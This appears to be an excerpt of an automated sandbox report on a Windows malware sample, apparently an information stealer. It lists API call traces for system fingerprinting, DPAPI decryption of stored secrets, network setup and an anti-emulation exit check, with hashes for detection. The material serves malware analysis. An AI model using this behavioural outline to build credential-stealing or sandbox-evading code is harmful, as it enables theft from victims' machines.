                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                        • Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                        • Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                        • Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                        • Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                        • Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                        • Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                        • Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,02D960E8,00000000,00020119,00000000), ref: 0041433B
                                                                                                        • Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,02DD7F30,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                        • Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                        • Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,02DD8AC0,00000000,?,0041D74C,00000000,?,00000000,00000000,?,02DD50A0), ref: 0041438F
                                                                                                        • Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,02DD8AC0,00000000,?,0041D74C,00000000,?,00000000,00000000,?,02DD50A0), ref: 00414396
                                                                                                        • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,02DD51E0,004136EB,0041D6E3), ref: 004143CD
                                                                                                        • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                        • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                        • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                        • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                        • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                        • Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
                                                                                                        • Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
                                                                                                        • Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
                                                                                                        • Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0
                                                                                                        • Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,02DD80E0,00000000,?,0041D758,00000000,?,00000000,00000000,?,02DD8BC0,00000000), ref: 004144C0
                                                                                                        • Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                        • Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                        • Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,02DD80E0,00000000,?,0041D758,00000000,?,00000000,00000000,?,02DD8BC0,00000000), ref: 00414542
                                                                                                        • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                        • Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                        • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                        • Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                        • Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                        • Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A
                                                                                                      • GetCurrentProcessId.KERNEL32(00000000,?,02DD8AE0,00000000,?,0041D76C,00000000,?,00000000,00000000,?,02DD8008,00000000,?,0041D768,00000000), ref: 0041037E
                                                                                                        • Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                        • Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                        • Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                        • Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                        • Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                        • Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,02D963F8,00000000,00020119,00000000), ref: 0041477B
                                                                                                        • Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,02DD88C0,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                        • Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6
                                                                                                        • Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
                                                                                                        • Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855
                                                                                                        • Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
                                                                                                        • Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3
                                                                                                        • Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,02DD7F90,00000000,?,0041D774,00000000,?,00000000,00000000,?,02DD81E8), ref: 0041496D
                                                                                                        • Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                        • Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                        • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
                                                                                                        • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
                                                                                                        • Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9
                                                                                                        • Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
                                                                                                        • Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
                                                                                                        • Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D
                                                                                                        • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,02DD5B60,00000000,00020019,00000000,0041D289), ref: 00414B41
                                                                                                        • Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                        • Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
                                                                                                        • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                        • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                        • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                        • Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                        • Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                        • Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                        • Part of subcall function 00414DE0: CloseHandle.KERNEL32(00000000), ref: 00414E9E
                                                                                                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B
                                                                                                        • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                        • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                        • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02DD4F80), ref: 00404ED9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentHandleInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalInternetLastLogicalMemoryModuleNextPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
                                                                                                      • String ID: E.A
                                                                                                      • API String ID: 2827757392-2211245587
                                                                                                      • Opcode ID: 0a1655d69d7d67d09a8accf2191c0ab67cebd284527337da85d13474bea66144
                                                                                                      • Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
                                                                                                      • Opcode Fuzzy Hash: 0a1655d69d7d67d09a8accf2191c0ab67cebd284527337da85d13474bea66144
                                                                                                      • Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                        • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                        • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                        • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                        • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                        • Part of subcall function 004093A0: CloseHandle.KERNEL32(000000FF), ref: 0040947A
                                                                                                        • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                      • StrStrA.SHLWAPI(00000000,02DD7DB0), ref: 0040971B
                                                                                                        • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
                                                                                                        • Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
                                                                                                        • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
                                                                                                        • Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
                                                                                                      • memcmp.MSVCRT ref: 00409774
                                                                                                        • Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                        • Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                        • Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                                      • String ID: $DPAPI
                                                                                                      • API String ID: 1204593910-1819349886
                                                                                                      • Opcode ID: c29f5cfde4a1b01b633900b3e4d9158c792444f62c15d0bc86c9e383e366a528
                                                                                                      • Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
                                                                                                      • Opcode Fuzzy Hash: c29f5cfde4a1b01b633900b3e4d9158c792444f62c15d0bc86c9e383e366a528
                                                                                                      • Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
                                                                                                      • GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 00415A27
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: File$CloseCreateHandleSize
                                                                                                      • String ID:
                                                                                                      • API String ID: 1378416451-0
                                                                                                      • Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                      • Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
                                                                                                      • Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                      • Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02DBD9C8,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004137B9
                                                                                                      • Sleep.KERNEL32(00001770), ref: 004137C4
                                                                                                      • CloseHandle.KERNEL32(?,00000000,?,02DBD9C8,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
                                                                                                      • ExitProcess.KERNEL32 ref: 004137E2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 941982115-0
                                                                                                      • Opcode ID: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
                                                                                                      • Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
                                                                                                      • Opcode Fuzzy Hash: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
                                                                                                      • Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Pi@
                                                                                                      • API String ID: 0-1360946908
                                                                                                      • Opcode ID: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
                                                                                                      • Instruction ID: 3e1b1374d11ee30af11b8018be346ecc1401931fa3badc01db0dac5c56ce0c6a
                                                                                                      • Opcode Fuzzy Hash: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
                                                                                                      • Instruction Fuzzy Hash: 756105B5D00208DBDB14DF94D984BEEB7B0AB48304F1185AAE80677380D739AEA5DF95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8
                                                                                                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CrackInternetlstrlenmalloc
                                                                                                      • String ID: <
                                                                                                      • API String ID: 3848002758-4251816714
                                                                                                      • Opcode ID: 3713e900d8af71bcda43d5451eba343ca8d18ed20fc7c58898e56e18ace5b70f
                                                                                                      • Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
                                                                                                      • Opcode Fuzzy Hash: 3713e900d8af71bcda43d5451eba343ca8d18ed20fc7c58898e56e18ace5b70f
                                                                                                      • Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • StrCmpCA.SHLWAPI(00000000,02DD5260), ref: 0040EFCE
                                                                                                      • StrCmpCA.SHLWAPI(00000000,02DD4F90), ref: 0040F06F
                                                                                                      • StrCmpCA.SHLWAPI(00000000,02DD5060), ref: 0040F17E
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3722407311-0
                                                                                                      • Opcode ID: 3566f950a70d9368d3bab53622fd0af9e896664e0c11b1e93c9bcc657f6cdd2a
                                                                                                      • Instruction ID: 4355cab003f180362ea4467312be264c8b2230b95154913c46dc9b5fce20c885
                                                                                                      • Opcode Fuzzy Hash: 3566f950a70d9368d3bab53622fd0af9e896664e0c11b1e93c9bcc657f6cdd2a
                                                                                                      • Instruction Fuzzy Hash: 8D719871B002099BCF08FF75D9929EEB77AAF94304B10852EF4099B285EA34DE45CBC5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • StrCmpCA.SHLWAPI(00000000,02DD5260), ref: 0040EFCE
                                                                                                      • StrCmpCA.SHLWAPI(00000000,02DD4F90), ref: 0040F06F
                                                                                                      • StrCmpCA.SHLWAPI(00000000,02DD5060), ref: 0040F17E
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3722407311-0
                                                                                                      • Opcode ID: 6db915fc9aef32804234284a1f8f815ae03aa27e0320bb305d1a5402418195c7
                                                                                                      • Instruction ID: f0c51ec5e8e6f52f2f367cc82315d09f99f950b48122d5325302ee48485a66a2
                                                                                                      • Opcode Fuzzy Hash: 6db915fc9aef32804234284a1f8f815ae03aa27e0320bb305d1a5402418195c7
                                                                                                      • Instruction Fuzzy Hash: 03618A71B002099FCF08EF75D9929EEB77AAF94304B10852EF4099B295DA34EE45CBC4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                      • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 3183270410-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                      • GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocComputerNameProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 4203777966-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                      • VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                      • ExitProcess.KERNEL32 ref: 00401103
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1103761159-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • strtok_s.MSVCRT ref: 004119C8
